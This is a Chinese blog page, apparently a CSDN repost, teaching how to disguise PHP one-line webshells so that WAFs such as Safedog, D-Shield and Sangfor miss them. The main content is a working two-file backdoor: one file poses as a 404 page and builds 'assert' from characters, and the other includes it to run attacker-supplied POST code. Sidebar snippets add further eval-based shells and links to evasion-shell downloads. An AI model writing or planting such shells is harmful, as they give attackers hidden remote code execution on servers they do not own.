php一句话过waf春秋,【过waf篇】一句话木马如何优雅地过waf

最新推荐文章于 2021-07-11 18:19:08 发布
最新推荐文章于 2021-07-11 18:19:08 发布
阅读量258 收藏
点赞数
文章标签: php一句话过waf春秋

【过waf篇】一句话木马如何优雅地过waf

0x00  WAF简介

作者:雨幕 微信公众号:异空间安全

Web应用防护系统(也称:网站应用级入侵防御系统。英文:WebApplicationFirewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

Waf拦截一句话木马原理:以正则表达式匹配关键字判断是否为一句话木马。

0x01 测试环境准备

安全狗 apache 4.0 (把所有防护开启)

D盾 2.12 测试版(最新,主要利用其查杀功能)

深信服 3.3.02

phpstudy

Snipaste_2018-06-29_06-54-51.png

Snipaste_2018-06-29_06-48-37.png

Snipaste_2018-06-29_06-52-41.png

Snipaste_2018-06-29_07-16-32.png

0x01 绕过WAF的常用方法

01.拆分文件法(过盾和狗和服)

拆分文件法意思为把本该一个文件完成的功能拆分成两个文件进行上传进行包含文件执行。这样做可以降低被查杀的概率,特别是某盾对函数捕捉特敏感,这时使用拆分文件法是最好的。

A.404页面拆分模式

404页面为访问页面不存在时候返回的页面,不容易引起别人的注意,适宜后门的隐藏。

文件1:new.php

404 Not Found

Not Found

The requested URL was not found on this server.

$arr = array('a', 's', 's', 'e', 'r', 't');

$func = '';

for ($i = 0; $i < count($arr); $i++) {

$func .= $func . $arr[$i];

}

@$a = @$_POST['a'];

@$b = @$_POST['b'];

$c = $a.$b;

$func = substr($func, -6);

$d = str_replace($a, '', $c);

header('HTTP/1.1 404 Not Found');

?>

文件2:shaD.php

include "new.php";

$func($d);

?>

为了减少深信服的扫描的时间,我把php一句话放到了test文件夹里面,直接扫描,这样减少扫描时间。

Snipaste_2018-06-27_09-49-55.png

Snipaste_2018-06-29_07-19-34.png

Snipaste_2018-06-29_07-19-44.png

Snipaste_2018-06-29_07-19-54.png

这里先演示一种方法,还有个人总结的五种方法将会在逐梦2期线上就业班里面详解,了解逐梦2期请点:

Ga小草帽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php回调后门,phpWAF一句话,php最新一句话,php过狗一句话.
SetToken的博客
03-21 7770
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 http://pan.baidu.com/s/1jHoJxHW China chopper http://pan.baidu.com/s/1eRxEYjC 分享一下,一些不需要动态函数、
绕过WAF-一句话木马
qq_30787769的博客
12-10 2605
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
一枚过WAF一句话的编写(加入自己的笔记)
大方子
08-21 1530
首先说下WAF的正则                            安全狗: 匹配关键字 ,出现就直接杀。                            D盾:一些常规查杀,并且如果出现$xxx($yyy); 也会直接查杀,哪怕你明确的给$xxx赋一个毫无危害的值                                       ...............
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
一句话木马要点和防范注意事项
最新发布
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
php冰蝎一句话,利用动态二进制加密实现新型一句话木马PHP(转)冰蝎
weixin_32550525的博客
04-05 845
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一文章里,过程中发现幅太大,所以分成了四,分别是:利用动态二进制加密实现新型一句话木马之Java利用动态二进制加密实现新型一句话木马之.net利用动态二进制加密实现新型一句话木马...
phpwaf 一句话,(转)一句话木马绕过WAF
weixin_39897070的博客
03-16 2004
在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇。今天这期我们从一句话木马的工作机制和WAF工作机制入手来讲如何绕过WAF的检测。一、一句话木马WAF介绍在这里就不再科普一句话木马的介绍,不明白的得可以看这里:一句话木马-百度百科。WAF的介绍可以看...
php大马过waf
04-28
php大马过waf,,......................................................................................................
2019最新过狗过,云锁,360等WAFPHP免杀大马
03-20
2019最新过狗过,云锁,360等WAFPHP免杀大马等主流防护软件,2019最新大马下载PHP
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
上传脚本文件(一句话后门)WAF绕过(php)
weixin_43916797的博客
07-11 302
变量覆盖、 1.变量覆盖 要上传的脚本: <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); > phpinfo();转为base64为:cGhwaW5mbygpOw== url为:www.xxx.com?x=b&y=assert 传入的data: x= cGhwaW5mbygpOw== 2.加密混淆 将脚本文件加密 加密连接:http://phpjiami.com/phpjiami.html
一个过waf的研究牛人
weixin_33724046的博客
07-10 344
https://soroush.secproject.com/blog/ https://appseceurope2018a.sched.com/speaker/soroush_dalili.1y2dtv3m waf-bypass-techniques-using-http-standard-and-web-servers-behavior
科迅免杀php一句话_php免杀一句话[2016最新过狗过盾等一切防火墙一句话]
weixin_31016735的博客
12-30 269
php免杀一句话[2016最新过狗过盾等一切防火墙一句话]常用一句话木马asp一句话木马php一句话木马:aspx一句话木马:其他一句话木马:"" Then Execute(Request("value"))%>""then session("value")=request("value"):end if:if session("value")<>"" then execute...
2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,phpwaf一句话)
SetToken的博客
11-10 9271
最新过狗一句话,2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,phpwaf一句话)
一句话WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1900
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过狗马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
Web提权技巧:一句话木马的免杀艺术
然而,即使一句话木马已经存在于目标服务器上,如果无法绕过WAF(Web应用防火墙)的检测,那么它也无法发挥实际作用。 技术细节部分,作者提到免杀(Evasion)策略,即通过修改或绕过安全软件的特征码识别,使得一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值